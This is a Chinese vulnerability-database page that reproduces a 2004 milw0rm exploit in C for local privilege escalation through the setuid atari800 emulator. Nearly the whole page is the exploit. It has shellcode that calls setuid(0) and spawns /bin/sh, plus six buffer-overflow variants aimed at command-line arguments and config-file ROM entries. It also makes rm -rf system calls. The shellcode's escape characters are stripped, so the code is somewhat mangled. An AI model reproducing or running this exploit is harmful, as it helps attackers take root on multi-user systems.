atari800 – Local Privilege Escalation
| 漏洞ID | 1054775 | 漏洞类型 | |
| 发布时间 | 2004-11-25 | 更新时间 | 2004-11-25 |
![图片[1]-atari800 – Local Privilege Escalation-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-atari800 – Local Privilege Escalation-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* Exploit for atari800 by pi3 (pi3ki31ny)
*
* pi3@pi3:~$ ./p
*
* ...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...
*
* Ussage:
* [+] ./p [options]
*
* -? <this help screen>
* -v choose a bug:
* 1 - first bug (in all versions Atari800)
* 2 - second bug (in older Atari800 - modiy argv[0])
* 3 - third bug (in config file - OS/A_ROM)
* 4 - fourth bug (in config file - OS/B_ROM)
* 5 - fifth bug (in config file - XL/XE_ROM)
* 6 - sixth bug (in config file - BASIC_ROM)
* -o <offset>
* -p PATH
*
* pi3@pi3:~$
*
* Atari800 have suid bit in default instalation.
* Best regards pi3 (pi3ki31ny).
*
* "Kazdemu trafi sie gowno...!"
*
* Greetz: [greetz on my web] && other my friends (you know who you are)
*
* ...::: -=[ www.pi3.int.pl ]=- :::...
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <assert.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define PATH "/usr/local/bin/atari800"
#define DIRS 256
#define CONFIG ".atari800.cfg"
/* ...::: -=[ www.pi3.int.pl ]=- :::... */
char shellcode[] = "x31xdbx31xc0x31xd2xb2x2dx6ax0ax68x3a"
"x2ex2ex2ex68x2dx20x3ax3ax68x6cx20x5d"
"x3dx68x6ex74x2ex70x68x69x33x2ex69x68"
"x77x77x2ex70x68x3dx5bx20x77x68x3ax3a"
"x20x2dx68x2ex2ex2ex3ax89xe1xb0x04xcd"
"x80"
/* setuid(0) */
"x31xdbx89xd8xb0x17xcdx80"
/* setgid(0) */
"x31xdbx89xd8xb0x2excdx80"
/* exec /bin/sh */
"x31xc0x50x68x2fx2fx73x68x68x2fx62x69"
"x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcd"
"x80"
/* exit(0) */
"x31xdbx89xd8xb0x01xcdx80";
long ret_ad(char *a1, char *a2) {
// return (0xbffffffa-strlen(a1)-strlen(a2));
return 0xbfffee01;
}
int ussage(char *arg) {
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("ntUssage:nt[+] %s [options]n
-? <this help screen>
-v choose a bug:
1 - first bug (in all versions Atari800)
2 - second bug (in older Atari800 - modiy argv[0])
3 - third bug (in config file - OS/A_ROM)
4 - fourth bug (in config file - OS/B_ROM)
5 - fifth bug (in config file - XL/XE_ROM)
6 - sixth bug (in config file - BASIC_ROM)
-o <offset>
-p PATHnn",arg);
exit(-1);
}
int main(int argc, char *argv[]) {
long ret,*buf_addr;
char envp[8196],*path=PATH;
static char *sh[0x02];
char buf[DIRS],link[500],conf[5000];
int i,opt,op2=0,offset=0;
FILE *fp;
while((opt = getopt(argc,argv,"p:o:v:?")) != -1) {
switch(opt) {
case 'o':
offset=atoi(optarg);
break;
case 'p':
path=optarg;
break;
case 'v':
op2=atoi(optarg);
break;
case '?':
default:
ussage(argv[0]);
break;
}
}
if (op2==0)
ussage(argv[0]);
if ( (fp=fopen(path,"r"))==NULL) {
printf("n*tI can't open path to victim! - %st*nn",path);
ussage(argv[0]);
} fclose(fp);
if ( (fp=fopen(CONFIG,"r"))==NULL) {
if ( (fp=fopen(CONFIG,"w"))==NULL) {
printf("I can't create config file!n");
exit(-1);
}
printf("nCreating config file...nnn");
fprintf(fp,"Atari 800 Emulator, Version 1.3.0n");
fprintf(fp,"OS/A_ROM=atariosa.romn");
fprintf(fp,"OS/B_ROM=atariosb.romn");
fprintf(fp,"XL/XE_ROM=atarixl.romn");
fprintf(fp,"BASIC_ROM=ataribas.romn");
fprintf(fp,"5200_ROM=n");
fprintf(fp,"DISK_DIR=.n");
fprintf(fp,"ROM_DIR=.n");
fprintf(fp,"H1_DIR=n");
fprintf(fp,"H2_DIR=n");
fprintf(fp,"H3_DIR=n");
fprintf(fp,"H4_DIR=n");
fprintf(fp,"HD_READ_ONLY=1n");
fprintf(fp,"EXE_DIR=n");
fprintf(fp,"STATE_DIR=n");
fprintf(fp,"PRINT_COMMAND=lpr %sn");
fprintf(fp,"SCREEN_REFRESH_RATIO=1n");
fprintf(fp,"MACHINE_TYPE=Atari XL/XEn");
fprintf(fp,"RAM_SIZE=64n");
fprintf(fp,"DEFAULT_TV_MODE=PALn");
fprintf(fp,"DISABLE_BASIC=1n");
fprintf(fp,"ENABLE_SIO_PATCH=1n");
fprintf(fp,"ENABLE_H_PATCH=1n");
fprintf(fp,"ENABLE_P_PATCH=1n");
fprintf(fp,"ENABLE_NEW_POKEY=1n");
fprintf(fp,"STEREO_POKEY=0n");
} fclose(fp);
if (op2==1) {
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using first bug in Atari800n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(link,"AA");
buf_addr=(long*)&link[2];
for(i=0;i<500;i+=4)
*(buf_addr)++ = ret;
link[499]='�';
printf("nExecuting the vuln program - %snn",PATH);
execle(PATH,PATH,link,0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
} else if (op2==2) {
system("rm -rf `perl -e 'print "\x41"x250'`; rm -f 1");
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using second bug in Atari800n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
memset(buf,0x41,(size_t)250);
strcpy(link,"./");
memset(&link[2],0x41,(size_t)252);
assert(mkdir(buf, 0755) != -1);
assert(chdir(buf) != -1);
buf_addr=(long*)buf;
for (i=0; i<80; i+=4)
*(buf_addr)++ = ret;
buf[80]='�';
// snprintf(link+252,500,"/`perl -e 'print "\x01\xee\xff\xbf"x20'` pi3");
snprintf(link+252,500,"/%s",buf);
assert(symlink(path, buf) != -1);
assert(chdir("../") != -1);
printf("nExecuting the vuln program - %snn",link);
// system(link);
execle(link,link,"pi3",0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
} else if (op2==3) {
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using third bug in Atari800n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"AA");
buf_addr=(long*)&conf[2];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='�';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can't create config file!nExiting...n");
exit(-1);
}
fprintf(fp,"OS/A_ROM=%sn",conf);
printf("nExecuting the vuln program - %snn",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
} else if (op2==4) {
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using fourth bug in Atari800n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"AA");
buf_addr=(long*)&conf[2];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='�';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can't create config file!nExiting...n");
exit(-1);
}
fprintf(fp,"OS/B_ROM=%sn",conf);
printf("nExecuting the vuln program - %snn",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
} else if (op2==5) {
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using fifth bug in Atari800n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"A");
buf_addr=(long*)&conf[1];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='�';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can't create config file!nExiting...n");
exit(-1);
}
fprintf(fp,"XL/XE_ROM=%sn",conf);
printf("nExecuting the vuln program - %snn",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
} else if (op2==6) {
printf("nt...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...n");
printf("nt[+] Bulding buffors!n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("t[+] Using adres 0x%xn",ret);
printf("t[+] Using sixth bug in Atari800n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"A");
buf_addr=(long*)&conf[1];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='�';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can't create config file!nExiting...n");
exit(-1);
}
fprintf(fp,"BASIC_ROM=%sn",conf);
printf("nExecuting the vuln program - %snn",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!n");
return 0;
}
}
// milw0rm.com [2004-11-25]U.S. Robotics Broadband Router 8003 Administration Web Interface Insecure Password Vulnerability 漏洞ID 1098371 漏洞类型 Design Error 发布…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666